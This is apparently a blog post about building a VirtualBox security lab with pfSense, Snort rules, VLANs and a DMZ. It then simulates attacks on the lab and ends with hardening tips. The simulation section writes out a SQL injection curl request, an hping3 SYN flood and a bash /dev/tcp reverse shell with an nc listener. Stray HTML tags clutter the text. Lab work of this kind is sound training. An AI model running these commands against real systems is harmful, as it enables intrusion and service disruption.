Building a Secure Network Architecture with VirtualBox: A Cybersecurity Project

2025-02-05

In this project, we implemented a comprehensive network architecture using VirtualBox, focusing on cybersecurity measures. Below are the key components and commands used:

1. Setting Up pfSense Firewall

• Installation: Download the pfSense ISO and set it up as a virtual machine in VirtualBox.
• Configuration:

  </li>
  </ul>
  
  <h1>Assign interfaces (WAN, LAN)</h1>
  
  ifconfig em0 up
  ifconfig em1 up
  
  <h1>Configure WAN and LAN IPs</h1>
  
  pfctl -e # Enable pf firewall
  

  – Rules: Set up rules to allow/block traffic between zones.

  2. Deploying Snort IDS

  • Installation:

    sudo apt-get update
    sudo apt-get install snort
    

  • Configuration:

    </li>
    </ul>
    
    <h1>Edit Snort configuration file</h1>
    
    sudo nano /etc/snort/snort.conf
    
    <h1>Add custom rules for SQLi and DoS detection</h1>
    
    alert tcp any any -> any 80 (msg:"SQL Injection Attempt"; content:"' OR '1'='1"; sid:1000001;)
    alert tcp any any -> any 80 (msg:"DoS Attack Detected"; threshold:type threshold, track by_src, count 100, seconds 60; sid:1000002;)
    

    – Start Snort:

    sudo snort -A console -q -c /etc/snort/snort.conf -i eth0
    

    3. Configuring VLANs and DMZ

    • VLAN Setup:

      </li>
      </ul>
      
      <h1>Create VLANs on a switch (simulated in VirtualBox)</h1>
      
      vconfig add eth0 10
      vconfig add eth0 20
      
      <h1>Assign IPs to VLANs</h1>
      
      ifconfig eth0.10 192.168.10.1 netmask 255.255.255.0 up
      ifconfig eth0.20 192.168.20.1 netmask 255.255.255.0 up
      

      – DMZ Configuration:
      – Place the web server in the DMZ and connect it to the MySQL database in the LAN.

      4. Simulating Cyberattacks

      • SQL Injection:

        </li>
        </ul>
        
        <h1>Simulate SQLi using curl</h1>
        
        curl "http://192.168.10.100/index.php?id=1' OR '1'='1"
        

        – Denial of Service (DoS):

        
        <h1>Use hping3 for DoS simulation</h1>
        
        hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood 192.168.10.100
        

        – Reverse Shell:

        
        <h1>On attacker machine</h1>
        
        nc -lvp 4444
        
        <h1>On target machine</h1>
        
        bash -i >& /dev/tcp/192.168.10.1/4444 0>&1
        

        What Undercode Say

        This project highlights the importance of securing network architectures through segmentation, firewalls, and intrusion detection systems. By simulating real-world attacks, we gained hands-on experience in identifying and mitigating threats. Below are additional Linux commands and tools to enhance your cybersecurity skills:

        • Nmap for Network Scanning:

          nmap -sP 192.168.10.0/24
          

        • Wireshark for Packet Analysis:

          sudo wireshark
          

        • Fail2Ban for Brute Force Protection:

          sudo apt-get install fail2ban
          sudo systemctl start fail2ban
          

        • SSH Hardening:

          sudo nano /etc/ssh/sshd_config</li>
          </ul>
          
          <h1>Disable root login and change port</h1>
          
          PermitRootLogin no
          Port 2222
          

          – Log Monitoring with Logwatch:

          sudo apt-get install logwatch
          sudo logwatch --detail high --mailto [email protected]
          

          For further reading, check out these resources:

          • pfSense Documentation
          • Snort User Manual
          • Nmap Official Guide

          By mastering these tools and techniques, you can build robust defenses against evolving cyber threats.

          References:

          Hackers Feeds, Undercode AI

          Share this:

          • Reddit
          • LinkedIn
          • Threads
          • Pinterest
          • Bluesky
          • WhatsApp
          • X
          • Telegram
          • Facebook
          • Email
          • Tumblr
          • Mastodon
          • Print